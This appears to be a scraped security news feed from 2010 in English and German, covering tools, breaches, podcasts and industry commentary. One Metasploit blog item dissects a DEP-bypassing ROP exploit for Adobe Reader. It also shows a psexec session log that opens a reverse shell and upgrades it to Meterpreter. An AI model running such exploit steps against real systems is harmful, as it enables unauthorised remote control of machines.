Security News

w3af, is a Web Application Attack and Audit Framework. The w3af core and it's plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much
Sofian Brabez, our FreeBSD expert, has updated the FreeBSD port of w3af to the 1.0-rc2 version and commited it to FreeBSD ports sources tree. If you're using FreeBSD, now you have one more reason to use w3af and make your life easier when (...) - Security Tools / Penetration testing & Ethical Hacking, Application Scanner, w3af Tools Tracker Team1798929303060903127302921839077878952869

Ein Hacker hat Exploit-Code gebaut, der eine Verbindung zu einer Shell via DNS durch Firewalls tunneln kann.(author unknown)02921839077878952869

Im texanischen Austin hat sich ein früherer Mitarbeiter eines Autohauses an seinem Ex-Arbeitgeber gerächt: Er legte kurzerhand mehr als 100 Kundenfahrzeuge über eine Internet/Mobilfunk-Verbindung lahm.(author unknown)02921839077878952869

On March 12th and 13th, a researcher named "villy" posted a couple of blogs relating to an exploit for CVE-2010-0188. On the 15th, I ported that exploit (python) over to Metasploit (ruby), which you can find here, in the module browser. Doing so is often rather straight forward, and in this particular case was no different. However, once I finished porting and moved into testing I noticed something odd... This exploit worked flawlessly against Adobe Reader 9.3 despite DEP being enabled. (For those who didn't know, Adobe Reader 9 enables DEP "permanently".) After I checked to make sure that DEP was indeed enabled (it was), I proceeded to try to figure out why this exploit worked.

The TIFF contents seemed rather blob-ish, which was suspicious to me. A bit of digging on the vulnerability revealed it was a stack-based buffer overflow which was eerily similar to CVE-2006-3547. I figured there must be something in the TIFF contents that was disabling DEP in some way. The first thing I tried was to turn the blob into an array of 32-bit little endian integers. This was pretty easily accomplished as you can see in an excerpt here:
irb> blob.unpack("V*").each { |dw| puts "0x%x" % dw }
...
0x70072f7
0x10104
0x70015bb
0x1000
...
On a gut feeling, I changed the payload to begin with a breakpoint and checked 0x70072f7 to see if it was mapped. Indeed it was, and it pointed to a "pop eax / ret" instruction sequence. Then I proceeded to put a breakpoint at 0x70072f7 to see how things progressed from there. What I found was that several function tails were being used to create a hunk memory of that was not protected by DEP. After this was created, a bit more ROP (return oriented proramming) was used to accomplish a "memcpy" of a small loader stub to this memory and execute it.

You might be asking yourself, "Great, but why do we care?" ... Well, AFAIK (feel free to comment), this is the first public exploit that uses multiple tail chunks to completely bypass permanent DEP. It certainly gives me a bit of chill to see this coming from a maliciously circulating document...

Upgrading Command Shell Sessions

For part two of this post, I wanted to highlight a little feature I added recently in response to a rather old ticket (#394). As of Revision 8088, it is now possible to turn existing Windows Command Shell sessions into full-blown Meterpreter sessions. This is all made possible by several recent advances in the framework, a large part of which was the CmdStager contributed by bannedit. You can see this functionality in action here:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set
...
LHOST 10.13.37.2
LPORT 1337
PAYLOAD windows/meterpreter/reverse_tcp
RHOST 10.13.37.102

msf exploit(psexec) > exploit -z
...
[*] Command shell session 1 opened (10.13.37.2:1337 -> 10.13.37.102:1057)
...
[*] Session 1 created in the background.
msf exploit(psexec) > sessions -l
...
1 shell Microsoft Windows 2000 [Version 5.00.2195] 10.13.37.2:1337 -> 10.13.37.102:1057
...
msf exploit(psexec) > sessions -u 1

[*] Started reverse handler on 10.13.37.2:1337
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)
[*] Command Stager progress - 9.48% done (5082/53587 bytes)
[*] Command Stager progress - 12.64% done (6776/53587 bytes)
[*] Command Stager progress - 15.81% done (8470/53587 bytes)
[*] Command Stager progress - 18.97% done (10164/53587 bytes)
[*] Command Stager progress - 22.13% done (11858/53587 bytes)
[*] Command Stager progress - 25.29% done (13552/53587 bytes)
[*] Command Stager progress - 28.45% done (15246/53587 bytes)
[*] Command Stager progress - 31.61% done (16940/53587 bytes)
[*] Command Stager progress - 34.77% done (18634/53587 bytes)
[*] Command Stager progress - 37.93% done (20328/53587 bytes)
[*] Command Stager progress - 41.10% done (22022/53587 bytes)
[*] Command Stager progress - 44.26% done (23716/53587 bytes)
[*] Command Stager progress - 47.42% done (25410/53587 bytes)
[*] Command Stager progress - 50.58% done (27104/53587 bytes)
[*] Command Stager progress - 53.74% done (28798/53587 bytes)
[*] Command Stager progress - 56.90% done (30492/53587 bytes)
[*] Command Stager progress - 60.06% done (32186/53587 bytes)
[*] Command Stager progress - 63.22% done (33880/53587 bytes)
[*] Command Stager progress - 66.39% done (35574/53587 bytes)
[*] Command Stager progress - 69.55% done (37268/53587 bytes)
[*] Command Stager progress - 72.71% done (38962/53587 bytes)
[*] Command Stager progress - 75.87% done (40656/53587 bytes)
[*] Command Stager progress - 79.03% done (42350/53587 bytes)
[*] Command Stager progress - 82.19% done (44044/53587 bytes)
[*] Command Stager progress - 85.35% done (45738/53587 bytes)
[*] Command Stager progress - 88.51% done (47432/53587 bytes)
[*] Command Stager progress - 91.68% done (49126/53587 bytes)
[*] Command Stager progress - 94.84% done (50820/53587 bytes)
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(psexec) > [*] Meterpreter session 2 opened (10.13.37.2:1337 -> 10.13.37.102:1058)

Den Ambitionen der Europäer, der Cybercrime-Konvention des Europrates zu globaler Bedeutung zu verhelfen, setzen die Vereinten Nationen eigene Bemühungen um eine weltweite Konvention zur Verbrechensbekämpfung im Internet entgegen.(author unknown)

Autos, die nicht mehr starten oder mitten in der Nacht loshupen - ein entlassener Angestellter eines texanischen Autohauses hat rund 100 Autobesitzer auf Trab gehalten. Er war in das Nutzerkonto eines ehemaligen Kollegen eingedrungen und hatte die Autos ferngesteuert lahmgelegt.

Das SP1 aktualisiert sowohl das Client- als auch das Server-Betriebssystem. Neue Funktionen für Windows 7 sind nicht enthalten, wohl aber für den Server: RemoteFX and Dynamic Memory.(author unknown)02921839077878952869

Experts are predicting that hackers at this year's CanSecWest Pwn2Own contest will definitely break into an Apple iPhone by exploiting a remote code execution vulnerability.Ryan Naraine0976714224207484754502921839077878952869

Die Drupal-Module Email Input Filter, Keys und Tag Order enthalten Sicherheitslücken, die man durch ein Update beseitigen sollte. Zumindest Ersteres ist kritisch, da darüber ein Einbruch in den Server möglich wird.(author unknown)02921839077878952869

20 Apple-Sicherheitslücken stehen kurz vor Veröffentlichung: Charlie Miller will Details zu den Schwachstellen kommende Woche auf der CanSecWest vortragen. Vorab sprach der Experte mit heise Security über die Sicherheit von Mac OS X.(author unknown)02921839077878952869

The PCI Security Standards Council's (PCI-SSC) recently published March Assessor Newsletter, which contains rather "interesting" language for certain Approved Scanning Vendors (ASV). It is unclear what the penalty will be for firms who continue their misleading practices. For those curious, WhiteHat Security was once an ASV, but has not been for over a year -- largely because we already understood the following requirements. We actually do focus on 6.6 to the spirit in which its supposed to be applied, while the others pay lip service and take customers for a ride.

ASV: I'm a lawyer so let me be your heart surgeon

Several ASVs have received notices recently surrounding the marketing of services they sell related to being qualified by the Council. While the PCI SSC does qualify each and every ASV to conduct external vulnerability scans to meet the external scan validation requirement for PCI DSS 11.2, it does not give any ASV license to sell their services for other security practices as an agent of the PCI Council.

Here are two examples that are unacceptable and violate the ASVs contract:

1. "As an ASV, our company has been certified by the PCI Council for you to achieve both Requirement 11.2 for vulnerability scanning and Requirement 6.6

There are two issues with the above statement. First, and this is a common mistake, ASVs do not help merchants fully achieve DSS Requirement 11.2. The requirement requires both internal vulnerability scanning and external vulnerability scanning. The Council only qualifies ASVs to perform the second half of that statement. Although an ASV can separately offer internal vulnerability scanning services, internal vulnerability scanning is a) not required to be done by an ASV and b) is not part of the ASV qualification process by the Council. We clarified this with a note in the 1.2 release of the PCI DSS and possibly further clarity to come October 2010. The second and more egregious is related to using a conjunction (YouTube "School House Rock" if you need a refresher on the function of a conjunction) to include another service completely unrelated to anything that has been validated by the PCI Council. In this case, there is no program to validate those who review adherence with Requirement 6.6 and the ASV lab testing is not an exhaustive process to endorse any solution as an exhaustive annual evaluation of the web application security. for application scanning."



WhiteHat Security is a leading provider of website security services.

Sourcefire's Matthew Olney examines vendor response to security issues and highlights the value of exploit code as part of defending computer systems.Ryan Naraine02921839077878952869

Please join us tomorrow night at 7:30 PM for DebateMania CXCI: "Controls vs. Threat-based Approaches to Information Security Monitoring".

We'll have Richard "Bonecrusher" Bejtlich, Director of Incident Response at GE, and Ron "Tenacious" Gula, CEO of Tenable Network Security, debate the pros and cons of having a strong IT controls program vs. one focused on responding to threats. Ron will fearlessly defend the practice of a controls program while Rich will bring bone crushing rebuttals for a threat-centric monitoring program.

NOTE: Picture is not an actual representation of past debates.
The live stream should be active around 19:30 EDT (7:30 PM), Thursday, March 18th. Please keep in mind that the recording time is as slippery as a lubed up Andre The Giant.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul, Larry, Carlos, Darren, John & Mick

(author unknown)02921839077878952869

It’s not every day I come across real wisdom in research but I saw a link yesterday to So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users which is a research paper written by one of the guys at Microsoft. There are some amazingly choice quotes in there, like:

as far as we can determine, there is no evidence of a single user being saved from harm by a certificate error, anywhere, ever. Thus, to a good approximation, 100% of certificate errors are false positives.

Priceless… Mozilla - take a word of advice from the MS guys and make your invalid SSL cert flow 1000% less annoying please. Anyway, another one of the quotes I thought was even more interesting:

If phishing victimizes 0.37% of users per year and each victim wastes 10 hours sorting it out, to be beneficial the daily effort of following the advice should be less than 0:0037 x 0:5 x 10=365 hours or 0.18 seconds per day.

So… if .18 seconds per day is too much, let’s take a look at what our anti-phishing technologies are doing. Let’s say they take up 2 whole seconds a day to download their lists, and verify that the sites you browse aren’t on that list, while you are surfing and trying to boot up and shut down browser processes, etc…. We are talking about more than 10x delta between what it should actually take. Further, let’s do the math on what would happen if anti-phishing went away. How many times worse would the phishing black market be if anti-phishing filters went away entirely and phishing was instead dealt with the registrars, ISPs and the brand owners themselves? Three times? Five times? Would it go to ten times? Would it go to more than ten times to make it actually worthwhile from an economic perspective?

How about UAC in Windows? How many seconds has that added to everyone’s day to stop the threat of malware? Does it add up and does it actually stop malware infections for the additional time it incurs? What about Anti-virus? Are we operating in a deficit or do those security products actually prove themselves to be worthwhile for the entire public? I know this is really tricky math based on an insane amount of variables, and it very might well prove out that some products are a no-brainer because they don’t add time or latency. But I do suspect there are a lot of things that we tend to think of as good ideas that actually end up being worse for the end user if you do the math. I know the article was really talking about user education being a bad idea economically (and I couldn’t agree more based on every study I’ve seen or been a part of). But it’s still interesting to think about how a similar formula could be applied elsewhere. Thought provoking research anyway.

Zählt ein Software-Fehler, der das Umgehen von Sicherheitssperren ermöglicht, selbst als Sicherheitslücke? Microsoft legt Wert auf die Feststellung, dass ein gerade bekannt gewordenes Problem in Virtual PC keine wirkliche Schwachstelle sei.(author unknown)02921839077878952869

Angreifer versuchen, insbesondere Mail-Server mit Postfix und SpamAssassin über eine Sicherheitslücke im SpamAssassin Milter Plugin zu kapern.(author unknown)02921839077878952869

Welcome to the Tenable Network Security Podcast - Episode 26

Announcements

• Two new blog posts have been released titled "The Value Of Credentialed Vulnerability Scanning and Microsoft Patch Tuesday - March 2010 - "It Won't Happen To Me" Edition.
• You can provide feedback to this podcast and all of our social media outlets by visiting our discussions forum and adding messages to the "Tenable Social Media" thread. I would love to hear your feedback, questions, comments and suggestions! I put up a call for ideas on new Nessus videos, so please give us your feedback!
• We're hiring! - Visit the web site for more information about open positions, there are currently 7 open positions listed!
• You can subscribe to the Tenable Network Security Podcast on iTunes!
• Tenable Tweets - You can find us on Twitter at http://twitter.com/tenablesecurity where we make various announcements, Nessus plugin statistics and more!

Interview - Ron Gula - CCDC Recap

Ron Gula and I discuss our experiences at the 2010 Collegiate Cyber Defense Exercise held this past weekend in Columbia, MD.

Stories

• Six Steps To "Cloud" Security - Nothing New - A researcher published a paper in the International Journal of Services and Standards titled "A 'cloud-free' security model for cloud computing". In it she outlines six security considerations for cloud computing, which to me represent nothing really new. The first, resource sharing on "cloud" providers could lead to your data being accessed. This is similar to VLANs on switches, which are essentially software, which means you need to carefully design your network to be certain your most critical assets are not on the same switch as something less critical. This is a risk decision, and should be constantly evaluated, whether you are using a "cloud" provider or designing VLANs on a switch. Second, she points out that since data is held off-site, ownership may have become compromised. This is another issue which I have dealt with when I worked for an ISP/hosting provider. Physically being separate from your data means that you need to make yet even more risk-based decisions. If the data you are hosting off-site is public anyway, then there is little need for concern. However, if the data is sensitive or confidential, you may want to take extra pre-cautions to safeguard it at remote sites (encryption, physical security, etc...). How is this different than using a remote storage facility for your backup tapes? There are more, and my advice is to look at the "cloud" security information and relate it to similar security and risk decisions in your organization and I believe you will find that you are well equipped to handle securing your organization, whether its cloudy or sunny.
• Security Policy Gone Wrong - This story centers around the following quote from a client: "Ok, how about this: We take an image of your hard drive when you enter the building. When you leave in the evening, we take another image and see what data changed. This way, we know if any sensitive data leaves the company." I like coming up with creative solutions, but this one just doesn't stick!
• Network Analysis Of A Logitech Mouse Server - While this may not sound particularly concerning, the protocol that allows you to control the keyboard and mouse of a system running this software does not authenticate the commands. This means a packet crafting tool, such as scapy, can be used to send keystrokes to the device. Most users find this type of technology convenient, but fail to realize the security risks. In your environment you have to control the installation of this type of software.

(Note: Please ignore the opening when I incorrectly refer to this as episode 25, whoops!)

Download Tenable Podcast Episode 26

http://www.heise.de/newsticker/meldung/US-Strafverfolger-nutzen-soziale-Netzwerke-fuer-verdeckte-Ermittlungen-956796.html/from/atom10

Die Marktforscher von Gartner prognostizieren, dass 60 Prozent der virtuellen Server weniger sicher sein werden, als die Systeme, die sie ersetzen sollen.(author unknown)02921839077878952869

Mittlerweile empfehlen die Mozilla-Entwickler, auf Version 3.6 des Webbrowsers zu wechseln; auch Firefox-3.5.x-User werden dazu aufgefordert. Für Firefox 3.0 gibt es nur noch ein einziges Update.(author unknown)02921839077878952869